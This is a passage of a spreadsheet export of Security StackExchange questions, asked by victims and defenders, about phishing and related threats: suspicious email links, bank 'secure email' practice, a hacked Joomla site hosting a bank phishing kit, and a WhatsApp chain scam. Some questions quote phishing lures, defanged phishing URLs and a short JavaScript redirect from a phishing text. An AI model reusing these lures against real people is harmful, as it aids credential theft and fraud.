 &lt;p&gt;The links do lead to Facebook, for an account-switching crafted URL. I get that one.&lt;/p&gt;
 &lt;p&gt;However, the text version of the email has something like this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;mailto:xxx@stanforduni.com;xxx@massachusettsins.co.uk;xxx@e-irosky.me;xxx@harvarduni.org;xxx@univofcambridge.eu;xxx@univofoxford.com;xxx@yandex.ru;xxx@yandex.ua;xxx@yandex.kz;xxx@yandex.by;xxx@yandex.com;xxx@mail.ru;xxx@yahoo.com;xxx@aol.com;xxx@gmail.com
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;(I redacted out usernames from those addresses.)&lt;/p&gt;
 &lt;p&gt;Some of those names seem to be related (maybe the same person across multiple domains?). Some others seem generic but on a similar vein (mostly universities).&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;My question is: what's the purpose of this &amp;quot;attack&amp;quot;?&lt;/strong&gt; Clicking on those would trigger my email client to prepare an email for all those addresses. What does an attacker gain out of this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>if computer is compromised, does hardware key still protect in ssh?</t>
  </si>
  <si>
    <t>&lt;p&gt;Let's say I sign into my local pc with a hardware key (eg yubicon). Let's say I further sign into a sensitive server (as root) via ssh using yubicon hardware key as well (ie only way to get into server is though ssh when yubicon key connected).&lt;/p&gt;
 &lt;p&gt;Now let's say I click on a phishing email that gains admin access to my machine.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;when I am 'away' can the threat actor access the server (assuming I logged out)?&lt;/li&gt;
 &lt;li&gt;when I am 'sitting there using it' can the attacker move into the server and plant access directly to the server so that they no longer are impeded at all by the key.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Thanks.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ssh&gt;&lt;key-management&gt;&lt;hardware&gt;</t>
  </si>
  <si>
    <t>Is this "secure email" mechanism my bank wants me to use best practice?</t>
  </si>
  <si>
    <t>&lt;p&gt;So, yesterday I needed to sign &amp;amp; scan some forms for my bank, a credit union. Nothing hugely confidential, except it has some account numbers on it. But still, I was a bit concerned, so the exchange, with my fairly senior advisor, whom I would not suspect to be IT savvy besides showing Powerpoints, went like this:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;&lt;em&gt;will this be secure, via email?&lt;/em&gt;&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;bank: &lt;em&gt;yes, we use secure email, as per our IT department. My assistant will be sending you a link to a login page where you can enter your credentials.&lt;/em&gt;&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;&lt;em&gt;a link? you realize that this is precisely how phishing works? a login URL. No one advocates this in the IT security field. I know I'm getting this now, so I know this one is safe, but what about next week?&lt;/em&gt;&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;bank: &lt;em&gt;(some variation of our IT dept says and what the heck do you know?, politely phrased)&lt;/em&gt;&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;OK, so I get the email, enter a password on their site and save the url so that at least I don't need to get it off the email the next time:&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;https://securemail.xxxyyyzzz.com/securereader/inbox.jsf&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;The web mail client is crappy so even though I replied with the forms, it shows nothing in the outbox. So, replying to the original, non-secure email, I asked if they received the secure reply, as it didn't show.&lt;/p&gt;
 &lt;p&gt;The answer? via secure email + url link, of course.&lt;/p&gt;
 &lt;p&gt;Errr, no great need to reply securely about this, but OK, I can test my login from my password manager.&lt;/p&gt;
 &lt;p&gt;As I write this, it seems to work now, but the first time it said something about an expired session, so I had to go back and actually use their second email's link:&lt;/p&gt;
 &lt;p&gt;Their plain email notifications say something like:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;This is a secure message.
 Click &amp;lt;some url here&amp;gt; by 2020-09-25 08:05 PDT to read your message.
 After that, open the attachment. 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;the actual URL is something like &lt;code&gt;https://securemail.xxxyyy.com/formpostdir/securereader?id=6pBzH9H9DbMMP2ALTFKr9DOXN7pcxxxx&amp;amp;brand=1c64710yyyy&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;So my question is: are these shenanigans, and especially the apparent insistence of me using login URLs from emails, in any way best practices? Seems to me, it would be much more secure if they made the email link accessible, still with an extra password, on their actual online banking site. Then they could say, not email, when you login, pick the &lt;strong&gt;Your account/Secure email&lt;/strong&gt; item on the top right. Or something to that effect.&lt;/p&gt;
 &lt;p&gt;And the session expiry mechanisms, if they exist should not interfere with storing the secure URL in a password manager, as opposed to needing to pick it up from incoming emails. I assume it's cookie-based as, even after shutting down my browser, I was able to login from my password manager after following the 2nd login URL.&lt;/p&gt;
 &lt;p&gt;I totally understand there is no risk at this point in time. We are in an ongoing set of transactions that have a phone component and those emails are not unexpected. I know my advisor's voice and she knows mine.&lt;/p&gt;
 &lt;p&gt;My concern is that this is training their average users to follow URL links in emails, leading to login pages for their banking with this institution.&lt;/p&gt;
 &lt;p&gt;Am I correct in finding this is not exactly best practices?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;banks&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>What would be the valid approach while handling short links</t>
  </si>
  <si>
    <t>&lt;p&gt;In modern world people often use to send urls with url shortners from various webservices,Mostly we use url shortners to shorten the url&lt;/p&gt;
 &lt;p&gt;But in terms of exploits,phishing attempts how could we avoid it,if it's regular url we could/might guess some part of the url and ensure the confidentiality of url and might click over it,&lt;/p&gt;
 &lt;p&gt;What would be the approach while handling short links which carries hidden exploits?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;web-browser&gt;&lt;threats&gt;</t>
  </si>
  <si>
    <t>Dedicated domain for email registration</t>
  </si>
  <si>
    <t>&lt;p&gt;With the recent surge in compromised user information on web services, I have the following solution in place for myself:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Registered a domain with an obscure domain name. (actually a bunch)&lt;/li&gt;
 &lt;li&gt;One email account with an obscure name&lt;/li&gt;
 &lt;li&gt;This email account is the catch-all for the domain&lt;/li&gt;
 &lt;li&gt;Now I register for online accounts with any "random_email_address@abscure_domain"&lt;/li&gt;
 &lt;li&gt;If the account / address is compromised, any attempt to access the emails linked to this email address is useless, since it is not linked to an account.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Except the usual dependency on the hosting service provider's security, what are the risks to my solution? I am thinking about security and privacy risks. &lt;/p&gt;
 &lt;p&gt;(Please don't state the obvious inconveniences of dealing with a catch-all)&lt;/p&gt;
 &lt;p&gt;The key risks I am trying to mitigate:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;Many online accounts --&gt; one registered email address. If someone gets hold of that "one" email account via brute force attack or other means, they would have access to all other accounts via password resets. &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Using the same email address everywhere enlarges the attack surface for spam / phishing / spear phishing.&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>Meaning of webpage link containing www23</t>
  </si>
  <si>
    <t>&lt;p&gt;I have come across a number of websites which include links such as &lt;strong&gt;www32&lt;/strong&gt;.example.com and also &lt;strong&gt;www2&lt;/strong&gt;.example.com. &lt;/p&gt;
 &lt;p&gt;Why is there a number in the &lt;strong&gt;www&lt;/strong&gt; part of the link?&lt;/p&gt;
 &lt;p&gt;Are these sites not legitimate? Thanks &lt;/p&gt;</t>
  </si>
  <si>
    <t>Random garbage in phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;What does it mean when an obvious scam e-mail, possibly &amp;quot;mere&amp;quot; phishing, includes in (whatever we call its signing-off small-print) what looks like a pointless list of dozens, perhaps hundreds of random words that are not, for instance, tags, as below?&lt;/p&gt;
 &lt;p&gt;Here, the yellow part seems both to make sense, and to have nothing to do with the scammy message.&lt;/p&gt;
 &lt;p&gt;If this is the wrong area to Ask such a Question, can anyone please redirect me?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/x1zRA.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/x1zRA.jpg" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>What are the pitfalls of adding a corporate eSIM to an unmanaged employee device in lieu of land-line phones?</t>
  </si>
  <si>
    <t>&lt;p&gt;Instead of having a landline at each employee's desk, allow them to add an eSIM to a compatible personal cell phone. (If possible, disable SMS for the added eSIM so it is acting as a replacement for the desk phone.)&lt;/p&gt;
 &lt;p&gt;Unmanaged phones are often used for MS365 and MFA already.&lt;/p&gt;
 &lt;p&gt;What MUST be considered when adding a company-owned eSIM tech to a personal phone?&lt;/p&gt;
 &lt;p&gt;If you're the attacker, what technical capabilities to do harm do you gain if you own one of these user's phones? (As opposed to owning a regular email user's unmanaged device, logging into email and phishing if you get their password and can trick UEBA.) Two that come to my mind easily are 1. SMS phishing with the newly-added business number (which I try to address above), and 2. easier impersonations (vishing).&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;mobile&gt;&lt;simcard&gt;</t>
  </si>
  <si>
    <t>Can someone trace the source of a text msg without a phone number, only a four digit code instead?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am receiving phishing texts from someone claiming to be from Chase Bank. There is no return phone number at the top, only a four digit number instead. The police tell me that this text (which obviously has the date and time) cannot be traced because of it. &lt;/p&gt;
 &lt;p&gt;I cannot believe, with today's technology, that this is true. Does anybody have an answer?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;sms&gt;</t>
  </si>
  <si>
    <t>Can a DNS provider take action if a phishing attempt comes from one of their domains?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received a delightful phishing attempt:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Please keep this email for your crypto-currency records. Someone recently used your
  password to try to sign into your Wallet Accoun&amp;nbsp; (CASE ID:9098853964) We
  prevented this sign-in attempt, because this might be a criminal hacker that was trying
  to access your Bitcoin Account. Here are some details of the event: - Tuesday 17:45:29 AM
  UTC - IP Address: &amp;nbsp;107.145.285.2 &amp;nbsp;(Moscow, Russia) If you did not try to
  access your Bitcoin wallet at that time, this was an unauthorized attempt and you should
  change your Wallet password immediately. Reset your password by CLICKING HERE Best
  Regards, BlockChain Team NOTE: If you do not want these warnings you can unsubscribe
  here (copyright BlockTeam 2016) &amp;nbsp;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;(note the extremely interesting IP address: &lt;code&gt;107.145.285.2&lt;/code&gt; - I guess in Soviet Russia IP address specifies specification)&lt;/p&gt;
 &lt;p&gt;The URLs specified in the email are registered through GoDaddy (I can add the domains here if that's appropriate), so I was wondering if GoDaddy has any responsibility or cares. Can DNS providers take action if they have phishing sites hosted on domains registered through them?&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;Update: As I looked through the email headers I just noticed this little guy:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;X-PHISHTEST: This is a phishing security test from KnowBe4 that has been
  authorized by the recipient organization&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;A quick search for KnowBe4 reveals that they're a security testing organization (or at least someone is making it look like them). So it looks like it &lt;em&gt;was&lt;/em&gt; a phishing attempt but only by an organization that's hired to be nefarious.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Why we should not allow our pages to be loaded through Iframe by unknown hosts?</t>
  </si>
  <si>
    <t>&lt;p&gt;One of OWASP recomendations is to set the header X-Frame-Options to allow our pages to be loaded in Iframes only by sameorigin.&lt;/p&gt;
 &lt;p&gt;One reason is because of phishing attacks, ok I understand. But if I were an attacker and the target was configured to set X-Frame-Options to sameorigin, I could just copy the target page layout (html, css, js etc) and insert in my site.&lt;/p&gt;
 &lt;p&gt;What another reason we have to configure this header?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;header&gt;&lt;iframe&gt;</t>
  </si>
  <si>
    <t>Is it safe to open email links in a private window?</t>
  </si>
  <si>
    <t>&lt;p&gt;Sometimes there are links on the email you have to click because they are agrements, but they are coming from a different URL. As of now what I'm doing is opening a private window and pasting the link there. Would this be an effective anti-phishing mechanism? Or can you still get hacked?&lt;/p&gt;
 &lt;p&gt;The reason behind my thinking of a new private window is that it doesn't expose cookies and passwords to that window. Besides that what are other dangers that could arise?&lt;/p&gt;
 &lt;p&gt;What is the best way to click on email links then?&lt;/p&gt;
 &lt;p&gt;Thanks&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;email&gt;&lt;account-security&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Phishing message in Outlook signature?</t>
  </si>
  <si>
    <t>&lt;p&gt;One of my organization's users just showed us an interesting problem: every message they tried to send (in OWA 365) contained the following scary text:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Your mailbox has exceeded one or more size limits set by your
  administrator. Your mailbox size is 1098957 KB. Mailbox size limits:
  You will receive a warning when your mailbox reaches 900000 KB.You may
  not be able to send or receive new mail until you reduce your mailbox
  size. To make more space available, &lt;strong&gt;Login Here&lt;/strong&gt; to reduce your mailbox
  size. See client Help for more information.&lt;/p&gt;
  &lt;p&gt;Help Desk.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;We discovered that &lt;a href="https://www.google.com/search?q=mailbox+size+1098957+kb" rel="nofollow"&gt;this common phishing message&lt;/a&gt; had been saved as the default signature (formatted text). It may have happened when checking mail on 3rd party computers while out of office. Their workstation shows no sign of infection.&lt;/p&gt;
 &lt;p&gt;Has anyone heard of Outlook signatures being used as an attack vector? My Google searches are coming up empty. It's possible that this was just a bizarre copy &amp;amp; paste mistake by the user rather than an intentional attack.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;infection-vector&gt;</t>
  </si>
  <si>
    <t>What should I do if I'm a victim of phishing attack of my iphone</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an sms on my iphone informing me from my local delivery company that I have a parcel pending and to click on the link, which I did as the link bought me to my local delivery company home webpage which looks very legitimate (&lt;a href="https://mysingpost.com" rel="nofollow noreferrer"&gt;https://mysingpost.com&lt;/a&gt;) with all the logos imitated well. I was asked to key my mobile number into the tracking box to track the status of my parcel, which I did and immediately I received an sms code (I didn't read the whole sms until I realised the attack and the sms stated by keying this code would allow access to my apple payment) to key into the website, which I did but then I realised it was a phishing attach as there was a box with chinese word appeared. What should I do?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;iphone&gt;</t>
  </si>
  <si>
    <t>Is single-click phishing possible?</t>
  </si>
  <si>
    <t>&lt;p&gt;For Chrome, IE/Edge, Safari, Firefox, Opera released after 2018, is it possible for a phishing to succeed by just enticing a user to click a URL? &lt;/p&gt;
 &lt;p&gt;Notice: The user only does a click on the URL, no any subsequent operations on the phishing website.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;phishing&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>Does the IDOR vulnerability have to be sensitive data?</t>
  </si>
  <si>
    <t>&lt;p&gt;I had a hard time convincing a bug I reported that it was a bug bounty program. It seems to be more of a discussion than a question.&lt;/p&gt;
 &lt;p&gt;Scenario: Users shop on the shopping site. The categories of these purchases are drawn from an endpoint under the name of &amp;quot;favorite categories&amp;quot;. Since the userId parameter is used here, and in a non-authenticated way, it turns out in which categories the user shopped with a different user ID. It is an openness that does not make sense directly and on its own. But technically it is a vulnerability.&lt;/p&gt;
 &lt;p&gt;Also, wouldn't it be credible to look at which category the person whose User ID I have captured is shopping in and then to perform a related phishing attack scenario according to that?&lt;/p&gt;
 &lt;p&gt;Sample : &lt;code&gt;/api/favorite-categories?userId=87df45cd-1111-4222-1111-a5222cdd6222&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;Do &lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html" rel="nofollow noreferrer"&gt;IDOR vulnerabilities&lt;/a&gt; need to contain sensitive data in the response?&lt;/p&gt;
 &lt;p&gt;Therefore, should the company close this vulnerability? Or is it difficult to consider it a vulnerability?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;appsec&gt;&lt;bug-bounty&gt;</t>
  </si>
  <si>
    <t>My Joomla WebSite Phished</t>
  </si>
  <si>
    <t>&lt;p&gt;My website is wirten in Joomla. The provider turned it off saying it has been phished.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;REQUIRES PHILIPPINES PROXY TO VIEW
 IP Address: 178.32.141.220
 Phishing Content:
 hxxps://www .officinadelle11 .it /portal/onlinebanking/verify_success.php
 hxxps://www .officinadelle11 .it /portal/onlinebanking/sign-in/index.php
 Brand Phished: Bank of Philippine Islands (BPI Express Online)
 Legitimate Brand URL&amp;amp;#39;s:
 http://bpi.com.ph
 http://bpidirect.com
 http://bpiexpressonline.com
 http://expressnet.ph
 https://beta.bpiexpressonline.com
 http://bpiautoloans.com
 http://bpiautomadness.com
 http://bpihousingloans.com
 http://bpiloans.com
 http://bpipersonalloans.com
 http://kanegosyo.com.ph
 http://kanegosyo.com
 http://bpicard.ph
 http://bpithrills.ph
 http://bpitravel.ph
 http://bpiunlock.ph
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I checked the FTP space and surprisingly there two files I never uploaded: one is called alex.php and another is a php class for unzip. The alex.php is really a submission form with translations in russian.
 I aske myself: how is possible to upload files to my FTP space? The credentials are very strong...&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;joomla&gt;</t>
  </si>
  <si>
    <t>Best way to handle identity theft incident?</t>
  </si>
  <si>
    <t>&lt;p&gt;A user's email is hacked, contacts copied, and similar emails (look alike emails with minor spelling differences) are created by the attacker with the same name and avatar, sending relatively well crafted and highly targeted emails to his contacts, mostly of the type "this is an emergency, send me some money now".&lt;/p&gt;
 &lt;p&gt;This happened to a friend months ago. He was able to retake his email, however the attacker is still very active. In one incident, the attacker was very close to convince my friends' bank account manager to transfer a hefty amount of money to a Western Union account in Thailand! The account manager called my friend because the money transfer details were missing one little information, and that is how it was stopped.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;What's the best way to handle such a case&lt;/strong&gt;?&lt;/p&gt;
 &lt;p&gt;Here's what I have and what I tried:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Calling Yahoo to block impersonating emails - after a 25 minutes international call, they said they cannot help (?)&lt;/li&gt;
 &lt;li&gt;The bank account manager email has a Western Union address, with name, address, and phone all in Thailand. What's the proper way of reporting this? does it help to do so?&lt;/li&gt;
 &lt;li&gt;I have text-dump of the email headers -- I'm not an expert but wouldn't that include the attacker's IP? assuming this is correct, should I attempt to report this IP? to whom?&lt;/li&gt;
 &lt;li&gt;In some of the emails, the attacker instructs recipients to go to a phishing website where they are asked to login using their email credentials. The website is hosted on free web hosting service 3gb.com&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I can share all details (WU details, email dumps, website) in a paste bin if it is acceptable per SSE policy. The fraudster have been a major pain. Any suggestions are welcome.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;social-engineering&gt;&lt;phishing&gt;&lt;fraud&gt;</t>
  </si>
  <si>
    <t>Risk assessment Struggling with scenario</t>
  </si>
  <si>
    <t>&lt;p&gt;I have been given a situation (see below),The question i need to answer to complete the task is: What is the ALE for phishing emails for the company, in pounds; e.g. 203,760? When i multiply the answers i have ARO * AV * EF = 38631600. This answer comes back as incorrect and i am struggling finding the correct:&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Asset Value - AV&lt;/strong&gt; (I get ¬£1575000 - ¬£225*7000)&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Exposure Factor - EF&lt;/strong&gt; (I get 0.01 - 225 is 0.01% of 1575000)&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Annualised Rate of Occurrence - ARO&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;80*7000*365 = 204400000&lt;/p&gt;
 &lt;p&gt;204400000 * 0.2% = 408800&lt;/p&gt;
 &lt;p&gt;408800 * 30% = 122640&lt;/p&gt;
 &lt;p&gt;122640 * 2% = 2452.8&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Phishing is of major concern to an organisation, so they have begun to
  monitor how big a risk it is posing. On average, 80 phishing emails
  are sent to everyone in the company per day. The company email filters
  stop 99.8% of these getting through. Of the emails that do get
  through, 30% of employees click on the link. Out of those employees,
  2% expose their company login details to the phishing website. For
  every set of company login details that are exposed to the hackers,
  the company has found that it costs them ¬£225. The company has 7,000
  employees.&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;risk&gt;&lt;exposure&gt;</t>
  </si>
  <si>
    <t>What's the payload of this phishing campaign (which I clicked)?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been really dumb and clicked a phishing link.&lt;/p&gt;
 &lt;p&gt;The link arrived via WhatsApp and consists of:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;A Nubank est√° fazendo anivers√°rio e quem ganha o presente √© voc√™!. S√£o 2.000 convites para um novo cart√£o com at√© R$ 12.000,00 de limite, e o melhor, sem consulta ao SPC/Serasa. Eu j√° fiz o meu, corra fazer o seu, restam poucos convites! Para resgatar seu convite acesse üëâ&lt;br&gt;
  [redacted link]&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;(Roughly translated, it offers a new credit card or an upgrade to your current one).&lt;/p&gt;
 &lt;p&gt;The redacted link opens &lt;a href="https://pastebin.com/bWjnDiRE" rel="nofollow noreferrer"&gt;this&lt;/a&gt; which redirects to &lt;a href="https://pastebin.com/2iTwyDid" rel="nofollow noreferrer"&gt;this&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;I've opened the link on my mobile browser (Chrome 72.0.3626.121 on Android 6.0.1, latest Chrome for Android according to Wikipedia) and didn't initially realized it was a phishing campaign.&lt;/p&gt;
 &lt;p&gt;It shows a generic "landing page", but didn't ask for personal data, just 3 apparently innocuous questions. &lt;/p&gt;
 &lt;p&gt;I answered the questions and it then it instructed me to share a link to my WhatsApp contacts.&lt;/p&gt;
 &lt;p&gt;I got suspicious and quit. Then I called my card provider and they assured me they don't do campaigns on messenger apps and the links were not legitimate.&lt;/p&gt;
 &lt;h1&gt;Questions&lt;/h1&gt;
 &lt;h2&gt;What do they want?&lt;/h2&gt;
 &lt;p&gt;What's the point of this campaign if they don't ask for personal data or passwords? They seem to go from the "capture" to the "replication" stage without the actual action in-between. &lt;/p&gt;
 &lt;p&gt;Here's what the whole process looks like:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Receive the previously stated message from a trusted WhatsApp contact.&lt;/li&gt;
 &lt;li&gt;Click on the link, it opens a sort of "landing page".&lt;/li&gt;
 &lt;li&gt;The page cointains some jQuery code and a button with a yes / no question. You pick an answer, it shows another yes/no question, 3 in total ("Do you onw a "x brand" card / "Would you like a new one with a $12k limit" / "Do you prefer mastercard or visa").&lt;/li&gt;
 &lt;li&gt;From a &lt;em&gt;very&lt;/em&gt; quick glance on the code, &lt;em&gt;it looks like they don't even send that data anywhere, as there is no &lt;code&gt;&amp;lt;form&amp;gt;&lt;/code&gt; element&lt;/em&gt;).&lt;/li&gt;
 &lt;li&gt;Now the page asks to "share this with your WhatsApp contacts" and shows a link.&lt;/li&gt;
 &lt;li&gt;Clicking this link opens the real, actual WhatsApp app in a sharing screen asking you to pick a contact (I stopped here and closed WhatsApp without picking a contact).&lt;/li&gt;
 &lt;li&gt;If you pick a contact, &lt;em&gt;it sends them the very same message that brought me to this very page&lt;/em&gt; (I didn't actually sent anyone anything and inferred this from logic as well as from the code, as the message I received is hard-coded on the source code).&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;em&gt;Something&lt;/em&gt; must be happening on that page, but it isn't capturing private info; at least, not ones inputted by the user. &lt;strong&gt;It looks like all they want is for exponential sharing to happen and then... &lt;em&gt;what?&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Is there an exploit or other kind of payload &lt;a href="https://pastebin.com/2iTwyDid" rel="nofollow noreferrer"&gt;here&lt;/a&gt;?&lt;/p&gt;
 &lt;h2&gt;Has my browser or OS been compromised?&lt;/h2&gt;
 &lt;p&gt;I have cleared all my cookies and site data from Chrome. Is there any other action I should perform? &lt;/p&gt;
 &lt;p&gt;It would be really inconvenient to reset my device to factory state, and even more to flash a retail ROM. I only want to do it if &lt;em&gt;absolutely&lt;/em&gt; necessary.&lt;/p&gt;</t>
  </si>
  <si>
    <t>I just received a phishing text message, how could this have worked?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received a phishing text message that pretended to be my bank. It had a link that went to a site that redirect to the following script:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;&amp;lt;script language="javascript"&amp;gt;var page = "Login.php?sslchannel=true&amp;amp;sessionid=XXX‚Äù; top.location = page; &amp;lt;/script&amp;gt;&amp;lt;/html&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;When I did a &lt;code&gt;wget&lt;/code&gt; on that page with the rest of the full url it ran the following script:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;script&amp;gt;
  window.googleJavaScriptRedirect = 1
 &amp;lt;/script&amp;gt;
 &amp;lt;script&amp;gt;
  var n = {
  navigateTo: function(b, a, d) {
  if (b != a &amp;amp;&amp;amp; b.google) {
  if (b.google.r) {
  b.google.r = 0;
  b.location.href = d;
  a.location.replace("about:blank");
  }
  } else {
  a.location.replace(d);
  }
  }
  };
  n.navigateTo(window.parent, window, "https://www.banksite.com/");
 &amp;lt;/script&amp;gt;&amp;lt;noscript&amp;gt;&amp;lt;META http-equiv="refresh" content="0;URL='https://www.banksite.com/'"&amp;gt;&amp;lt;/noscript&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;From a technical perspective, I'm trying to figure out what this phishing text could have done in the worst case scenario.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;spoofing&gt;&lt;reverse-engineering&gt;</t>
  </si>
  <si>
    <t>If we integrate CDR in our email solution, do we really need Sandbox as well?</t>
  </si>
  <si>
    <t>&lt;p&gt;In the case of social engineering attack vector is an email sent with a malicious attachment like XSL file, I am not really understanding where we will need Sandbox solution if we can just use CDR (content disarm and reconstruction) solution (in many cases much cheaper for organization)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;antivirus&gt;&lt;phishing&gt;&lt;sandbox&gt;</t>
  </si>
  <si>
    <t>user71650</t>
  </si>
  <si>
    <t>There's a lot of spam, and hacked sites are often used to distribute it</t>
  </si>
  <si>
    <t>&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="https://security.stackexchange.com/questions/6377/what-are-common-official-methods-of-reporting-spam-phishing-nasty-grams-to-organi"&gt;What are common/official methods of reporting spam/phishing/nasty-grams to organizations?&lt;/a&gt; &lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;My production application receives a lot of emails and I can easily detect spam from it. From that spam, I can parse the dangerous URLs found in the emails. What can I do with this list of hacked sites? Can it be submitted to any organization to help protect from those sites? I know about phishtank.com, but they only want phishing sites. &lt;/p&gt;
 &lt;p&gt;Also, most of my spam comes from hacked yahoo/aol/hotmail/etc accounts.&lt;/p&gt;
 &lt;p&gt;Please recommend sites that I could post my list.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Mystery link containing fragment identifier in malicious email</t>
  </si>
  <si>
    <t>&lt;p&gt;The following link was received in a suspected phishing attack email. Unfortunately, the recipient clicked on the link in their outlook client:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;tr&amp;gt;
  &amp;lt;td class="m_-[string-of-19-numbers]m_-[string-of-19-numbers]gmail-x_gmail-summaryIfMobile" style="text-decoration:none;padding:18.1px 13px;background-color:rgb(212,238,246);font-family:Trebuchet MS;font-size:11px;font-weight:normal;font-style:normal;text-align:left;color:rgb(80,80,80)"&amp;gt;
  This summary of your queued emails for the last 7 days. Please use the
  retrieve queued emails to release emails your email account &amp;lt;a 
  rel="noopener noreferrer" href="http://#%23email%23%23" target="_blank"&amp;gt;info@email.address&amp;lt;/a&amp;gt; inbox.&amp;lt;/td&amp;gt;
 &amp;lt;/tr&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The user reported that it opened a new window in their web browser (firefox), which is expected based on the &lt;code&gt;target&lt;/code&gt;. I'm trying to determine the possible scope of the breach. Ordinarily I would assume &lt;code&gt;http://#%23email%23%23&lt;/code&gt; is a broken link, since there's no actual resource identifier before the fragment identifier. However, given the phishing and the client-side nature of fragment identifier interpretation, I'm left wondering:&lt;/p&gt;
 &lt;p&gt;What was the attacker trying to do with this link? How can fragment identifiers be abused? Are there other areas of this email that I should look to for clues?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;uri&gt;</t>
  </si>
  <si>
    <t>How do i verify a banks contact number is correct?</t>
  </si>
  <si>
    <t>&lt;p&gt;You will often get contact numbers for banks online or through other people, even on the back of your cards. How can one verify whether a number is genuine? &lt;/p&gt;
